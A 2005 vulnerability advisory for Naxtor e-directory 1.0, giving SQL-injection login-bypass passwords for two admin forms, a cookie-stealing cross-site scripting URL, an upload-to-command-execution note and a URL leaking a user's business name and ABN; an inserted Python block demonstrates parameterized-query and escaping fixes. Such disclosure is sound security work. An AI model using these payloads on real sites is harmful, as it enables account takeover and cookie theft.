Naxtor e-directory Multiple Vulnerability
Reported by basher13

Update:
3:34 03/08/2005


Subject:
"Naxtor e-directory Multiple Vulnerability"



Vulnerable version:
Naxtor e-directory 1.0



Typical software:
commercial



Vendor URL:
Mail - sales@naxtor.com.au 
WWW - www.naxtor.com.au





Description:
Naxtor e-directory is a powerful, flexible software application developed specifically for the requirements of membership directories.
It differs from traditional directories in that merchants are not limited to advertising service or product listings; they are also provided with promotional schemes to market their products and services.
The admin has full control over merchants' listings and promotional schemes and can approve or disapprove them at any time based on merchant credentials.





Vulnerability:
Multiple vulnerabilities were found in the Naxtor e-directory ASP product.
The first is in the administration login, where a user can inject SQL commands to obtain administrator privileges.

The administration page is vulnerable to gaining admin privileges: using SQL injection in the admin login form,
after a successful login, we can run as the administrator of the website.

1. Sample SQL injection:
.admin/default.asp

User ID : admin
Password : 'or '='


2. Sample SQL injection:
.signin.asp:

User ID : admin
Password : 'or '='

If the login through the signin.asp form succeeds, the user may upload an image with any file type, which could
execute commands and take over the victim's computer.

Another vulnerability: a user can steal cookies by entering a cross-site scripting (CSS) string into the browser URL, for example:

 http://host/site/message.asp?message=[script]alert(document.cookie);[/script]
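Both login forms above behave as if the submitted User ID and Password were concatenated straight into a SQL string, which is why a quote-breaking password such as the `'or '='` shown (written below in its canonical form `' OR ''='` so the constructed statement parses) satisfies the WHERE clause without a valid password. The Python below is added here as an illustration, not code from the advisory or from Naxtor: it rebuilds that lookup against a constructed in-memory SQLite table, shows the same lookup done with bound parameters, and adds the output escaping that would keep the message.asp script string inert. The table name, columns and credentials are assumptions.

```python
import html
import sqlite3

# Constructed stand-in for the directory's user table (assumed schema, sample data).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (userid TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'correct-horse-battery')")
    return db

def login_concat(db, userid, password):
    """Vulnerable pattern: the WHERE clause is assembled by string concatenation,
    the classic-ASP idiom the advisory describes. A quote in the password ends the
    literal early and the remainder is parsed as SQL."""
    sql = ("SELECT userid FROM users WHERE userid='" + userid
           + "' AND password='" + password + "'")
    return db.execute(sql).fetchone() is not None

def login_param(db, userid, password):
    """Hardened: bound parameters send the password as data, so the quote stays
    inside the value and the condition cannot be rewritten."""
    sql = "SELECT userid FROM users WHERE userid=? AND password=?"
    return db.execute(sql, (userid, password)).fetchone() is not None

def render_message(message):
    """message.asp-style reflection of a query parameter: HTML-escape before
    echoing so a <script> tag in the URL is displayed as text, not executed."""
    return "<p>" + html.escape(message, quote=True) + "</p>"

if __name__ == "__main__":
    db = make_db()
    bypass = "' OR ''='"  # canonical form of the advisory's 'or '=' password
    print("concat, bogus password:", login_concat(db, "admin", bypass))  # True
    print("param,  bogus password:", login_param(db, "admin", bypass))   # False
    print("param,  real password :", login_param(db, "admin", "correct-horse-battery"))  # True
    print(render_message("<script>alert(document.cookie)</script>"))
```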

Also, by requesting the following URL in the browser, we can see the user ID, business name and ABN number:

 http://host/users/message.asp

with the result:

User Id:
    asad

Business name:
    UNIVERSAL ELECTRONIC SERVICES

ABN No:
    78 764 879 417




Solution:
The vendor has been contacted about these vulnerabilities.





Published by:
basher13 (Infam0us Gr0up - Securiti Research)
basher13@linuxmail.org / infamous.2hell.com